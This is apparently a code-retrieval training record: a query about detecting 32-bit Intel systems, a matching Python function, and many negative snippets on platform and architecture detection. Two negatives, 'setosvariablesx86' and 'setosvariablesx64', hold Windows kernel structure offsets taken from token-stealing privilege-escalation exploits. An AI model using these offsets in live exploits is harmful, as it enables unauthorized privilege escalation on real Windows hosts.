__salt__[\"cmd.run\"](cmd).splitlines()\n ret = out[0].split(\": \")\n return ret[1]", "def is_osx():\r\n return sys.platform == \"darwin\"", "def parse_compute_version(compute_version):\n split_ver = compute_version.split(\".\")\n try:\n major = int(split_ver[0])\n minor = int(split_ver[1])\n return major, minor\n except (IndexError, ValueError) as err:\n # pylint: disable=raise-missing-from\n raise RuntimeError(\"Compute version parsing error: \" + str(err))", "def checkVersion(version):\n libxml2mod.xmlCheckVersion(version)" ]
[ "0.6574004", "0.6253473", "0.6247122", "0.6238033", "0.6165214", "0.6156912", "0.612077", "0.60846204", "0.60516804", "0.6008613", "0.5996625", "0.5967177", "0.59521145", "0.59322596", "0.5885311", "0.5882469", "0.58820486", "0.5845207", "0.5835244", "0.5812287", "0.580141", "0.5753324", "0.5741814", "0.57388365", "0.5727548", "0.5719305", "0.5712523", "0.570974", "0.5707202", "0.56917536", "0.56886", "0.5681082", "0.567781", "0.56752706", "0.5669042", "0.56520915", "0.563045", "0.56144625", "0.5608853", "0.56012267", "0.5595813", "0.5594198", "0.55610126", "0.5554938", "0.55531675", "0.555052", "0.5536245", "0.5531941", "0.55185723", "0.550402", "0.550306", "0.54941756", "0.5482692", "0.5473175", "0.54664034", "0.54502594", "0.5433305", "0.5428296", "0.54251426", "0.54243875", "0.54180247", "0.5411779", "0.5403252", "0.54024285", "0.53984666", "0.53982735", "0.53982705", "0.53831863", "0.5376291", "0.5376133", "0.5367487", "0.53663164", "0.53526837", "0.5350293", "0.53497815", "0.5331338", "0.5327808", "0.53268427", "0.53252304", "0.5319384", "0.53179497", "0.5303032", "0.53007823", "0.5298958", "0.52976817", "0.5286069", "0.5283271", "0.52830714", "0.5282459", "0.5280961", "0.5279745", "0.5279075", "0.5278545", "0.5277735", "0.5274737", "0.5272376", "0.52643603", "0.52623206", "0.52616286", "0.5261231" ]
0.62811625
1
Detect Intel x86 32bit system
def isIntelX86_32bit(): return String(System.getProperty("os.arch", "null").strip()).toLowerCase(Locale.ROOT) == "x86"
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def is_32bit(self):\n return self.machine in ['i386', 'i586', 'i686']", "def osarch_is_32_bit():\n return osarch_match(\"32-bit\")", "def osarch_is_ia32():\n return osarch_match(\"ia32\")", "def host_arch_win():\n\n arch = os.environ.get('PROCESSOR_ARCHITECTURE', 'x86')\n\n matchup = {\n 'AMD64' : 'x64',\n 'x86' : 'ia32',\n 'arm' : 'arm',\n }\n\n return matchup.get(arch, 'ia32')", "def host_arch_win():\n\n arch = os.environ.get('PROCESSOR_ARCHITECTURE', 'x86')\n\n matchup = {\n 'AMD64': 'x64',\n 'x86': 'ia32',\n 'arm': 'arm',\n }\n\n return matchup.get(arch, 'ia32')", "def is_64_windows():\n return 'PROGRAMFILES(X86)' in os.environ", "def is_64_windows(self):\n return 'PROGRAMFILES(X86)' in os.environ", "def get_os_name(x86=0):\r\n platform_in_short, on_win = sys.platform[:3], 0\r\n\r\n if platform_in_short == \"win\":\r\n on_win = 1\r\n os_name = \"nt\"\r\n elif platform_in_short == \"lin\":\r\n os_name = \"lin\"\r\n else:\r\n os_name = \"sol\"\r\n if not x86:\r\n os_name += \"64\"\r\n return on_win, os_name", "def get_os_name(x86=0):\r\n platform_in_short, on_win = sys.platform[:3], 0\r\n\r\n if platform_in_short == \"win\":\r\n on_win = 1\r\n os_name = \"nt\"\r\n elif platform_in_short == \"lin\":\r\n os_name = \"lin\"\r\n else:\r\n os_name = \"sol\"\r\n if not x86:\r\n os_name += \"64\"\r\n return on_win, os_name", "def host_arch_cc():\n\n k = cc_macros()\n\n matchup = {\n '__x86_64__' : 'x64',\n '__i386__' : 'ia32',\n '__arm__' : 'arm',\n }\n\n rtn = 'ia32' # default\n\n for i in matchup:\n if i in k and k[i] != '0':\n rtn = matchup[i]\n break\n\n return rtn", "def bitness():\n # see https://docs.python.org/2/library/platform.html#platform.architecture\n return '64-bit' if sys.maxsize > 2**32 else '32-bit'", "def osarch_is_amd64():\n return osarch_match(\"amd64\")", "def host_arch_cc():\n\n k = cc_macros()\n\n matchup = {\n '__x86_64__': 'x64',\n '__i386__': 'ia32',\n '__arm__': 'arm',\n }\n\n rtn = 'ia32' # default\n\n for i in matchup:\n if i in k and k[i] != '0':\n rtn = matchup[i]\n break\n\n return rtn", "def architecture(self):\n return self.random.choice([\n 'x86_64', \n 'x86'\n ])", "def is_64bit(self):\n return self.machine == 'x86_64'", "def test_cpu_architecture_value(self):\n \n cpu_architecture = get_cpu_information()[0]\n \n # Check to make sure the returned value is \"x86_64\"\n self.assertEqual(cpu_architecture, 'x86_64')", "def osarch_is_64_bit():\n return osarch_match(\"64-bit\")", "def usefulFunction():\n print(platform.uname()) # Yay it told me about my computer - no idea what it means but thats cool", "def on_powerpc():\n return processor() == 'powerpc' or machine().startswith('ppc')", "def is_vserver_kernel():\n\n kinfo = commands.getoutput('/bin/uname -a').split()[2]\n return '-vs' in kinfo", "def architecture():\n if is_darwin:\n # Darwin's platform.architecture() is buggy and always\n # returns \"64bit\" event for the 32bit version of Python's\n # universal binary. So we roll out our own (that works\n # on Darwin).\n if sys.maxsize > 2 ** 32:\n return '64bit'\n else:\n return '32bit'\n else:\n return platform.architecture()[0]", "def usefulFunction():\n print(platform.uname()) #displayed this computer's specifications", "def setosvariablesx86():\n\tKPROCESS = ''\n\tAPLINKS = ''\n\tUPID = ''\n\tTOKEN = ''\n\tversion = sys.getwindowsversion()\n\n\tif((version.major == 5) and (version.minor == 1) and ('3' in version.service_pack)):\n\t\t# the target machine's OS is Windows XP SP3\n\t\tprint \"[*] OS version: Windows XP SP3\"\n\t\tKPROCESS = '\\x44'\n\t\tTOKEN\t= '\\xC8'\n\t\tUPID\t = '\\x84'\n\t\tAPLINKS = '\\x88'\n \n\telif((version.major == 5) and (version.minor == 2) and ('2' in version.service_pack)):\n\t\t# the target machine's OS is Windows Server 2003 SP2\n\t\tprint \"[*] OS version: Windows Server 2003 SP2\"\n\t\tKPROCESS = '\\x38'\n\t\tTOKEN\t= '\\xD8'\n\t\tUPID\t = '\\x94'\n\t\tAPLINKS = '\\x98'\n \n\telif((version.major == 6) and (version.minor == 0) and ('1' in version.service_pack or '2' in version.service_pack) and (version.product_type == VER_NT_WORKSTATION)):\n\t\t# the target machine's OS is Windows Vista SP1 / SP2\n\t\tprint \"[*] OS version: Windows Vista SP1 / SP2\"\n\t\tKPROCESS = '\\x48'\n\t\tTOKEN\t= '\\xE0'\n\t\tUPID\t = '\\x9C'\n\t\tAPLINKS = '\\xA0'\n \n\telif((version.major == 6) and (version.minor == 0) and ('1' in version.service_pack or '2' in version.service_pack) and (version.product_type != VER_NT_WORKSTATION)):\n\t\t# the target machine's OS is Windows Server 2008 / SP2\n\t\tprint \"[*] OS version: Windows Server 2008 / SP2\"\n\t\tKPROCESS = '\\x48'\n\t\tTOKEN\t= '\\xE0'\n\t\tUPID\t = '\\x9C'\n\t\tAPLINKS = '\\xA0'\n \n\telif((version.major == 6) and (version.minor == 1)):\n\t\t# the target machine's OS is Windows 7 / SP1\n\t\tprint \"[*] OS version: Windows 7 / SP1\"\n\t\tKPROCESS = '\\x50'\n\t\tTOKEN\t= '\\xF8'\n\t\tUPID\t = '\\xB4'\n\t\tAPLINKS = '\\xB8'\n\t\n\telse:\n\t\tprint \"[-] No matching OS version, exiting...\"\n\t\tsys.exit(-1)\n\t\n\treturn (KPROCESS,APLINKS,UPID,TOKEN)", "def is64bit(self):\n return platform.machine().endswith('64')", "def is_64bit():\n is64bit = sys.maxsize > 2 ** 32\n if sys.platform == \"cli\":\n is64bit = sys.executable.endswith(\"ipy64.exe\")\n return is64bit", "def get_arch():\n arch = platform.machine()\n if arch == \"i686\":\n return \"i686\"\n elif arch == \"x86_64\":\n return \"x86_64\"\n elif arch == \"aarch64\":\n return \"aarch64\"\n else:\n return \"unknown\"", "def get_platform_architecture() -> None:\n global _PLATFORM, _ARCHITECTURE, _COMPRESSION\n\n x86_64 = {\"x86_64\", \"amd64\", \"AMD64\", \"64bit\"}\n i386 = {\"i386\", \"i486\", \"i586\", \"i686\", \"386\", \"x86\", \"32bit\"}\n\n system = platform.system()\n if system == \"Windows\":\n machine = platform.machine()\n else:\n machine = os.uname().machine\n\n if system == \"Linux\":\n _PLATFORM = \"linux\"\n if machine in x86_64:\n _ARCHITECTURE = \"64\"\n elif machine in i386:\n _ARCHITECTURE = \"32\"\n else:\n _ARCHITECTURE = \"other\"\n\n elif system in {\"OpenBSD\", \"NetBSD\", \"FreeBSD\"}:\n _PLATFORM = \"bsd\"\n _ARCHITECTURE = \"other\"\n if system == \"FreeBSD\":\n if machine in x86_64:\n if detect_freebsd_linux_compatibility(\"64\"):\n _PLATFORM = \"linux\"\n _ARCHITECTURE = \"64\"\n elif machine in i386:\n if detect_freebsd_linux_compatibility(\"32\"):\n _PLATFORM = \"linux\"\n _ARCHITECTURE = \"32\"\n\n elif system in {\"Haiku\", \"Hurd\"}:\n _PLATFORM = \"linux\"\n _ARCHITECTURE = \"other\"\n\n elif system == \"Darwin\":\n _PLATFORM = \"mac\"\n _ARCHITECTURE = \"os\"\n elif system == \"Windows\":\n _PLATFORM = \"win\"\n if machine in x86_64:\n _ARCHITECTURE = \"64\"\n elif machine in i386:\n _ARCHITECTURE = \"32\"\n if not all([_PLATFORM, _ARCHITECTURE]):\n raise PlatformError(f\"Failed to detect appropriate platform. {system} {machine}\")\n\n if _PLATFORM == \"win\":\n _COMPRESSION = \"zip\"\n else:\n _COMPRESSION = \"tar.gz\"", "def isOnNao():\n szCpuInfo = \"/proc/cpuinfo\";\n if not os.path.exists( szCpuInfo ): # already done by the getFileContents\n return False;\n szAllFile = getFileContents( szCpuInfo, bQuiet = True );\n if( szAllFile.find( \"Geode\" ) == -1 and szAllFile.find( \"Intel(R) Atom(TM)\" ) == -1 ):\n return False;\n return True;", "def test_os_processor(self):\n self.assertEqual(self.settings.OS_PROCESSOR, platform.processor())", "def processor():\n return uname().processor", "def processor():\n return uname().processor", "def test_wrong_architecture(tmp_path, host_python, build_python, get_resource):\n\n crossenv = make_crossenv(tmp_path, host_python, build_python,\n '--cc=/usr/bin/gcc')\n for line in crossenv.creation_log.splitlines():\n if re.match(r'WARNING:.*architecture', line):\n return\n assert False, \"Crossenv did not detect wrong architecture\"", "def check_architecture(target_architecture):\n if target_architecture == ARCH_16_BIT:\n # should be fine, most computers are at least 32 bit these days\n pass\n elif target_architecture == ARCH_32_BIT:\n # should be fine, most computers are at least 32 bit these days\n pass\n elif target_architecture == ARCH_64_BIT:\n # needs to be a 64 bit system\n is_64_bit_system = platform.machine().endswith(\"64\")\n if not is_64_bit_system:\n log_error(\"you are unable to analyze a 64-bit binary on a non-64-bit system\")\n else:\n log_error(f\"something is strange with the architecture type '{target_architecture}'\")", "def is_64_windows():\n return struct.calcsize('P') * 8 == 64", "def is64Bit(program: ghidra.program.model.listing.Program) -> bool:\n ...", "def get_current_kernel_arch():\r\n try:\r\n return os.popen('uname -m').read().rstrip()\r\n except:\r\n logging.info(\"Not Found\")\r\n return -1", "def setosvariablesx64():\n\tKPROCESS = ''\n\tFLINK = ''\n\tUPID = ''\n\tTOKEN = ''\n\tversion = sys.getwindowsversion()\n\tif((version.major == 5) and (version.minor == 2)):\n\t\t# the target machine's OS is Windows Server 2003\n\t\tprint \"[*] OS version: Windows Server 2003\"\n\t\tKPROCESS = '\\x68'\n\t\tTOKEN\t= '\\x60\\x01' #0x160\n\t\tUPID\t = '\\xd8\\x00'\n\t\tFLINK = '\\xe0\\x00'\n\telif((version.major == 6) and (version.minor == 1) and ('1' in version.service_pack)):\n\t\t# the target machine's OS is Windows 7x64 SP1\n\t\t#tbd\n\t\tprint \"[*] OS version: Windows 7x64 SP1\"\n\t\tKPROCESS = '\\x70'\n\t\tTOKEN\t= '\\x08\\x02' #0x208\n\t\tUPID\t = '\\x80\\x01' #180\n\t\tFLINK = '\\x88\\x01' #188\n\telse:\n\t\tprint \"[-] No matching OS version, exiting...\"\n\t\tsys.exit(-1)\n\t\t\n\treturn (KPROCESS,FLINK,UPID,TOKEN)", "def _on_windows() -> bool:\n return os.name == \"nt\"", "def is_system(self) -> bool:", "def is_jetson():\n # TODO: check x86_64 explicitly instead in case somebody tries\n # to run this in mips or ppc or something\n # TODO: do further checking if aarch64 to determine whether in fact\n # a tegra system, and if so, which one\n return True if platform.processor() == 'aarch64' else False", "def identify_system() -> str:\n system = platform.system()\n if system not in [\"Linux\", \"Darwin\"]:\n raise ValueError(f\"Unsupported system {system}\")\n return system", "def machine():\n mach = platform.machine()\n if mach.startswith('arm'):\n return 'arm'\n else:\n # Assume x86/x86_64 machine.\n return None", "def find_current_arch():\n \n filetype = idaapi.get_file_type_name()\n \n if '386' in filetype:\n print 'Architecture: 32-bit intel.'\n return (ir.IR_INTEL_x86, ir.intel.ir_intel_x86, intel.disassembler)\n elif 'x86-64' in filetype:\n print 'Architecture: 64-bit intel.'\n return (ir.IR_INTEL_x64, ir.intel.ir_intel_x64, intel.disassembler)\n \n raise RuntimeError(\"Don't know which arch to choose for %s\" % (repr(filetype), ))", "def get_arch():\n with settings(hide('running', 'stdout')):\n arch = run('uname -m')\n return arch", "def has_intel_os(self):\n raise DeviceException(DeviceException.FEATURE_NOT_IMPLEMENTED)", "def check_platform():\n system = platform.system()\n distro = platform.platform()\n is_raspberry_pi = False\n try:\n info = open(\"/proc/cpuinfo\").read()\n except FileNotFoundError:\n is_raspberry_pi = False\n else:\n # bcm2708: Raspberry Pi 1\n # bcm2709: Raspberry Pi 2\n # bcm2710: Raspberry Pi 3\n is_raspberry_pi = 'BCM27' in info or 'ODROID' in info\n\n return system == \"Linux\" and (\n os.path.isfile('/proc/device-tree/hat/uuid') or\n 'boot2docker' in distro.lower() or\n is_raspberry_pi or\n os.path.isfile('/sys/hypervisor/uuid') or\n os.path.isdir('/var/lib/digitalocean')\n )", "def win():\n if platform.system() in WINDOWS:\n return True\n return False", "def is_windows():\n return sys.platform == \"win32\"", "def mac_gcc_architecture():\n # Darwin's platform.architecture() is buggy and always\n # returns \"64bit\" event for the 32bit version of Python's\n # universal binary. So we roll out our own (that works\n # on Darwin).\n if sys.maxint > 2L ** 32:\n # 64bit\n return 'x86_64'\n else:\n # 32bit\n return 'i386'", "def test_system_platform():\n accepted_values = ['windows', 'linux']\n output = sh.system_platform()\n assert output in accepted_values", "def sanitize(info):\n if \"processor\" in info and info[\"processor\"] == \"universal-x86-x86_64\":\n # If we're running on OS X 10.6 or newer, assume 64-bit\n if release[:4] >= \"10.6\": # Note this is a string comparison\n info[\"processor\"] = \"x86_64\"\n info[\"bits\"] = 64\n else:\n info[\"processor\"] = \"x86\"\n info[\"bits\"] = 32", "def is_win():\n return sys.platform[:3] == \"win\"", "def is_vrpd():\n cpu_type = platform.machine()\n\n if cpu_type in ['i686', 'i386', 'x86_64', 'armv7l']:\n return True\n\n return False", "def kern():\n return platform.uname()", "def architecture(executable=None, bits='', linkage=''): ###\n # Use the sizeof(pointer) as default number of bits if nothing\n # else is given as default.\n if not bits:\n import struct\n try:\n size = struct.calcsize('P')\n except ValueError: ###\n # Older installations can only query longs\n size = struct.calcsize('l')\n bits = str(size*8) + 'bit'\n\n return bits, linkage", "def known_os_type():\n return 'Linux'", "def usefulFunction():\n# I think the uname platform is a func. for findout out the information of the computer\n print(platform.uname())", "def is_windows():\r\n return sys.platform == \"win32\"", "def is_windows():\n return os.name == \"nt\"", "def architecture(cls):\n\n bits, _ = platform.architecture()\n machine = platform.machine()\n\n # Check for ARM machine\n if bits == '32bit' and machine.startswith('armv'):\n return cls.arm(machine)\n\n # Check (bits, machine) map\n machine_key = (bits, machine)\n\n if machine_key in MACHINE_MAP:\n return MACHINE_MAP[machine_key]\n\n # Check (bits) map\n if bits in BITS_MAP:\n return BITS_MAP[bits]\n\n log.error('Unable to determine system architecture - bits: %r, machine: %r', bits, machine)\n return None", "def msan_supported(goroot: GoRoot) -> bool:\n if goroot.goos == \"linux\":\n return goroot.goarch in (\"amd64\", \"arm64\")\n elif goroot.goos == \"freebsd\":\n return goroot.goarch == \"amd64\"\n else:\n return False", "def os_is_windows():\n return platform.system() == \"Windows\"", "def _in_wsl():\n return \"microsoft-standard\" in uname().release", "def local_info():\n local('uname -a')", "def init_linuxArch(self):\n archDic = {'i386': 'i386', 'i686': 'i386', 'i586': 'i386', 'amd64': 'x86_64', 'x86_64': 'x86_64',\n 'i86pc': 'x86_64'}\n result, resultErr = self.ksp_ssh.ssh_execute_command('uname -m')\n #self.logger.info(\"arch info %s\" % (result.strip()))\n self.realArch = result.strip()\n linuxArch = archDic.get(result.strip(), \"unknownArch\") # 判断计算机是多少位\n #self.logger.info(\"linux arch info %s\" % linuxArch)\n return linuxArch", "def matchDLLArch(filename):\n # TODO: check machine type on other platforms?\n if not is_win:\n return True\n\n global _exe_machine_type\n try:\n if _exe_machine_type is None:\n pefilename = sys.executable # for exception handling\n exe_pe = pefile.PE(sys.executable, fast_load=True)\n _exe_machine_type = exe_pe.FILE_HEADER.Machine\n exe_pe.close()\n\n pefilename = filename # for exception handling\n pe = pefile.PE(filename, fast_load=True)\n match_arch = pe.FILE_HEADER.Machine == _exe_machine_type\n pe.close()\n except pefile.PEFormatError as exc:\n raise SystemExit('Can not get architecture from file: %s\\n'\n ' Reason: %s' % (pefilename, exc))\n return match_arch", "def is_windows():\n if os.name == \"nt\":\n return True\n return False", "def systemversionstr():\n return platform.uname().system", "def is_low_core_system(ihost, dba):\n cpu_list = dba.icpu_get_by_ihost(ihost['uuid'])\n number_physical_cores = 0\n for cpu in cpu_list:\n if int(cpu['thread']) == 0:\n number_physical_cores += 1\n return number_physical_cores <= constants.NUMBER_CORES_XEOND", "def is_linux():\r\n return sys.platform.startswith('linux')", "def is_linux():\n (sysname, nodename, release, version, machine) = os.uname()\n return sysname == 'Linux'", "def is_linux():\n return sys.platform[:5] == \"linux\"", "def test_cpu_architecture_type(self):\n \n cpu_architecture = get_cpu_information()[0]\n \n # Check to make sure the returned value is a string\n self.assertEqual(type(cpu_architecture), str)", "def get_system():\n if 'google.colab' in sys.modules:\n return Constant.SYS_GOOGLE_COLAB\n if os.name == 'posix':\n return Constant.SYS_LINUX\n if os.name == 'nt':\n return Constant.SYS_WINDOWS\n\n raise EnvironmentError('Unsupported environment')", "def this_host():\n host_os = platform.system()\n print('This platform OS is: ', host_os)\n return", "def guess_is_sys_id(value):\n return re.match(r'^[A-Za-z0-9]{32}$', value) is not None", "def getplatform():\n\n # Return the system platform\n return sys.platform", "def detect_backend():\n try:\n from termpixels.unix import UnixBackend\n return UnixBackend()\n except:\n try:\n from termpixels.win32_vt import Win32VtBackend\n return Win32VtBackend()\n except Exception as e:\n raise e\n from termpixels.win32 import Win32Backend\n return Win32Backend()", "def platform():\n return ['linux']", "def get_system_information(self):\n\t\tsys = platform.uname()\n\t\treturn {\n\t\t\t'hostname': sys.node,\n\t\t\t'operating_system': sys.system,\n\t\t\t'version': sys.version,\n\t\t\t'release': sys.release,\n\t\t\t'processor' : sys.processor,\n\t\t\t'processor_type': sys.machine,\n\t\t}", "def is_system(self) -> undefined.UndefinedOr[bool]:", "def has32bit_linux(self, has32bit_linux):\n\n self._has32bit_linux = has32bit_linux", "def is_windows() -> bool:\n\n return sys.platform == 'win32'", "def is_32_bit_int_compatible( i ) :\r\n\r\n #\r\n # can we convert the input to an integer value ? \r\n #\r\n\r\n try : \r\n\r\n ## debug:\r\n ## print \"compat: \", i, truncate_pyint_to_i32_interval(i)\r\n\r\n if i == truncate_pyint_to_i32_interval( i ) : \r\n ## # debug \r\n ## print \"compat: TRUE\", i, truncate_pyint_to_i32_interval(i)\r\n return True\r\n\r\n except :\r\n\r\n ## # debug : \r\n ## print \"compat: FALSE\", i, truncate_pyint_to_i32_interval(i)\r\n pass\r\n \r\n # else ... \r\n return False", "def is_64bit(self):\n pass", "def test_amd64(self):\n self.do_test(\"2lwp_process_SIGSEGV.amd64\", pid=665, region_count=24)", "def should_i_even_bother(file_bytes):\n if file_bytes[E_MAG[0]:E_MAG[1]] == (str(0x7f) + \"ELF\"):\n if file_bytes[E_BIT[0]] == 1:\n if file_bytes[E_END[0]] == 1:\n return True #this is a 32-bit little-endian ELF file\n return False #this is not a 32-bit little-endian ELF file", "def on_windows ():\n if bjam.variable(\"NT\"):\n return True\n\n elif bjam.variable(\"UNIX\"):\n\n uname = bjam.variable(\"JAMUNAME\")\n if uname and uname[0].startswith(\"CYGWIN\"):\n return True\n\n return False", "def incompatible_architecture(self) -> bool:\n return pulumi.get(self, \"incompatible_architecture\")", "def is_x64_syscall(self, mnemonic):\n return mnemonic == 'syscall'", "def test_amd64(self):\n self.do_test(\"1lwp_SIGSEGV.amd64\", pid=693, region_count=21)", "def osversion():\n return platform()", "def UsableWindowsBinary(entity_type,entity_ids_arr):\n\tif not UsableWindows(entity_type,entity_ids_arr):\n\t\treturn False\n\tfulFileName = entity_ids_arr[0]\n\tif os.path.isdir(fulFileName):\n\t\treturn False\n\tfilename, file_extension = os.path.splitext(fulFileName)\n\t# TODO: Must add library type for ELF and PE ?\n\treturn file_extension.upper() in [\".EXE\", \".DLL\", \".COM\", \".OCX\", \".SYS\", \".ACM\", \".BPL\", \".DPL\"]", "def GetPlatform(self):\n arch = \"None\"\n # check architecture name\n if \"CMTCONFIG\" in os.environ:\n arch = os.environ[\"CMTCONFIG\"]\n elif \"SCRAM_ARCH\" in os.environ:\n arch = os.environ[\"SCRAM_ARCH\"]\n return arch", "def is_windows() -> bool:\n return sys.platform == \"win32\"", "def get_nt_platform_vars ():\n platform = util.get_platform()\n if platform == \"win-amd64\":\n # the Visual C++ runtime files are installed in the x86 directory\n progvar = \"%ProgramFiles(x86)%\"\n architecture = \"amd64\"\n elif platform == \"win32\":\n progvar = \"%ProgramFiles%\"\n architecture = \"x86\"\n else:\n raise ValueError(\"Unsupported platform %r\" % platform)\n return os.path.expandvars(progvar), architecture", "def platform_supported(self):\n return platform.system().lower() in self.platforms if self.platforms else False", "def _os_supported(self, plugin):\r\n return sys.platform in plugin.plugin_object.get_supported_os()", "def sanity_check_step(self):\n\n binprefix = \"bin/intel64\"\n libprefix = \"lib/intel64/lib\"\n if LooseVersion(self.version) >= LooseVersion(\"2011\"):\n if LooseVersion(self.version) <= LooseVersion(\"2011.3.174\"):\n binprefix = \"bin\"\n elif LooseVersion(self.version) >= LooseVersion(\"2013_sp1\"):\n binprefix = \"bin\"\n libprefix = \"lib/intel64/lib\"\n else:\n libprefix = \"compiler/lib/intel64/lib\"\n\n custom_paths = {\n 'files': [\"%s/%s\" % (binprefix, x) for x in [\"icc\", \"icpc\", \"idb\"]] +\n [\"%s%s\" % (libprefix, x) for x in [\"iomp5.a\", \"iomp5.so\"]],\n 'dirs': [],\n }\n\n super(EB_icc, self).sanity_check_step(custom_paths=custom_paths)", "def race_detector_supported(goroot: GoRoot) -> bool:\n if goroot.goos == \"linux\":\n return goroot.goarch in (\"amd64\", \"ppc64le\", \"arm64\", \"s390x\")\n elif goroot.goos == \"darwin\":\n return goroot.goarch in (\"amd64\", \"arm64\")\n elif goroot.goos in (\"freebsd\", \"netbsd\", \"openbsd\", \"windows\"):\n return goroot.goarch == \"amd64\"\n else:\n return False" ]
[ "0.81732696", "0.80353045", "0.7400126", "0.6873196", "0.6867948", "0.6770266", "0.6644437", "0.6488959", "0.6488959", "0.6432496", "0.6342804", "0.63230413", "0.6291553", "0.62735385", "0.6245272", "0.615874", "0.6148934", "0.6148358", "0.613531", "0.5986601", "0.5973497", "0.59698814", "0.59559375", "0.59020966", "0.58889675", "0.58845216", "0.58734906", "0.58576053", "0.58499914", "0.5842323", "0.5842323", "0.58060765", "0.5803824", "0.5803136", "0.58011997", "0.5800664", "0.5798221", "0.57915103", "0.5786441", "0.57819176", "0.5765628", "0.5746037", "0.5729667", "0.5717453", "0.56968874", "0.5695253", "0.5680608", "0.5666319", "0.5652716", "0.56469834", "0.5628347", "0.5624756", "0.56194484", "0.56188", "0.5616663", "0.5613204", "0.5607454", "0.56074005", "0.558849", "0.5584226", "0.55543417", "0.55520463", "0.5535836", "0.55185544", "0.5467686", "0.54612994", "0.5454498", "0.54468906", "0.54397243", "0.5431188", "0.54035467", "0.54009295", "0.5397035", "0.5385716", "0.5384243", "0.5367073", "0.5364767", "0.5352294", "0.5351047", "0.53478324", "0.5343768", "0.53392303", "0.5327983", "0.53243834", "0.53237563", "0.53204346", "0.5320416", "0.5317315", "0.52973163", "0.5296111", "0.52936953", "0.52924025", "0.5287065", "0.5272165", "0.52716655", "0.5266562", "0.5263489", "0.52624", "0.52557206", "0.52557063" ]
0.8507626
0
Grabs the MD defaultText font, reduces default size down to below 18, sets UIManager defaults (if runtime extension, will probably error, so I catch and skip)
def setDefaultFonts(): if MD_REF_UI is None: return # If a runtime extension, then this may fail, depending on timing... Just ignore and return... try: myFont = MD_REF.getUI().getFonts().defaultText except: myPrint("B","ERROR trying to call .getUI().getFonts().defaultText - skipping setDefaultFonts()") return if myFont is None: myPrint("B","WARNING: In setDefaultFonts(): calling .getUI().getFonts().defaultText has returned None (but moneydance_ui was set) - skipping setDefaultFonts()") return if myFont.getSize()>18: try: myFont = myFont.deriveFont(16.0) myPrint("B", "I have reduced the font size down to point-size 16 - Default Fonts are now set to: %s" %(myFont)) except: myPrint("B","ERROR - failed to override font point size down to 16.... will ignore and continue. Font set to: %s" %(myFont)) else: myPrint("DB", "Attempting to set default font to %s" %myFont) try: UIManager.getLookAndFeelDefaults().put("defaultFont", myFont ) # https://thebadprogrammer.com/swing-uimanager-keys/ UIManager.put("CheckBoxMenuItem.acceleratorFont", myFont) UIManager.put("Button.font", myFont) UIManager.put("ToggleButton.font", myFont) UIManager.put("RadioButton.font", myFont) UIManager.put("CheckBox.font", myFont) UIManager.put("ColorChooser.font", myFont) UIManager.put("ComboBox.font", myFont) UIManager.put("Label.font", myFont) UIManager.put("List.font", myFont) UIManager.put("MenuBar.font", myFont) UIManager.put("Menu.acceleratorFont", myFont) UIManager.put("RadioButtonMenuItem.acceleratorFont", myFont) UIManager.put("MenuItem.acceleratorFont", myFont) UIManager.put("MenuItem.font", myFont) UIManager.put("RadioButtonMenuItem.font", myFont) UIManager.put("CheckBoxMenuItem.font", myFont) UIManager.put("OptionPane.buttonFont", myFont) UIManager.put("OptionPane.messageFont", myFont) UIManager.put("Menu.font", myFont) UIManager.put("PopupMenu.font", myFont) UIManager.put("OptionPane.font", myFont) UIManager.put("Panel.font", myFont) UIManager.put("ProgressBar.font", myFont) UIManager.put("ScrollPane.font", myFont) UIManager.put("Viewport.font", myFont) UIManager.put("TabbedPane.font", myFont) UIManager.put("Slider.font", myFont) UIManager.put("Table.font", myFont) UIManager.put("TableHeader.font", myFont) UIManager.put("TextField.font", myFont) UIManager.put("Spinner.font", myFont) UIManager.put("PasswordField.font", myFont) UIManager.put("TextArea.font", myFont) UIManager.put("TextPane.font", myFont) UIManager.put("EditorPane.font", myFont) UIManager.put("TabbedPane.smallFont", myFont) UIManager.put("TitledBorder.font", myFont) UIManager.put("ToolBar.font", myFont) UIManager.put("ToolTip.font", myFont) UIManager.put("Tree.font", myFont) UIManager.put("FormattedTextField.font", myFont) UIManager.put("IconButton.font", myFont) UIManager.put("InternalFrame.optionDialogTitleFont", myFont) UIManager.put("InternalFrame.paletteTitleFont", myFont) UIManager.put("InternalFrame.titleFont", myFont) except: myPrint("B","Failed to set Swing default fonts to use Moneydance defaults... sorry") myPrint("DB",".setDefaultFonts() successfully executed...") return
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def _set_default_font(cls):\n if platform.system() == \"Linux\":\n for family in (\"DejaVu Sans\", \"Noto Sans\", \"Nimbus Sans\"):\n if family in tk.font.families():\n logger.debug(\"Setting default font to: '%s'\", family)\n tk.font.nametofont(\"TkDefaultFont\").configure(family=family)\n tk.font.nametofont(\"TkHeadingFont\").configure(family=family)\n tk.font.nametofont(\"TkMenuFont\").configure(family=family)\n break\n return tk.font.nametofont(\"TkDefaultFont\").configure()[\"family\"]", "def defaultFont(self, p_int=None): # real signature unknown; restored from __doc__ with multiple overloads\r\n pass", "def GetDefaultFont(self):\n return wx.Font(10, wx.MODERN, wx.NORMAL, wx.NORMAL)", "def loadDefaultFont(size):\n\n try:\n f = pygame.font.Font(None,size)\n except error, message:\n print \"Cannot load the default font\"\n raise SystemExit, message\n return f", "def set_font_size(*args):\n size = font_size.get()\n message_inp.configure(font=f'TKDefault {size}')", "def setHardwareFont():\n dislin.hwfont()", "def setTTFont(font='default'):\n if font == 'default':\n font = 'Times New Roman' \n dislin.winfnt(font)", "def test_configs_font(\n self):\n root = Tk()\n custom = font.Font(root, family='Helvetica', size=12)\n self.assertEqual(custom.cget('family'), 'Helvetica')\n fontSelect.font_style(custom, 'Times')\n self.assertEqual(custom.cget('family'), 'Times')\n fontSelect.font_size(custom, 18)\n self.assertEqual(custom.cget('size'), 18)", "def set_font_family_default(self):\n font = QFont('Arial', 12)\n self.parent.setCurrentFont(font)", "def __init__(self, font='mediumbold'):\n\tself.set_font(font)", "def base_font(self) -> str:\n pass", "def setDislinFont(font='default'):\n fontdict[font]()", "def get_default_font(bold=False):\n font = _QFont()\n font.setPointSize(FONT_SIZE)\n font.setBold(bold)\n return font", "def setFont(font='default',hardware=1):\n if font == 'default' and hardware:\n setHardwareFont()\n return\n currfmt = getFileFormat()\n if isPostscript(currfmt):\n setPSFont(font)\n elif isWMF(currfmt):\n setTTFont(font)\n else:\n setDislinFont(font)", "def get_text_font ( self, object ):\n return self.text_font", "def setup(theme='DarkAmber'):\r\n sg.theme(theme)\r\n\r\n 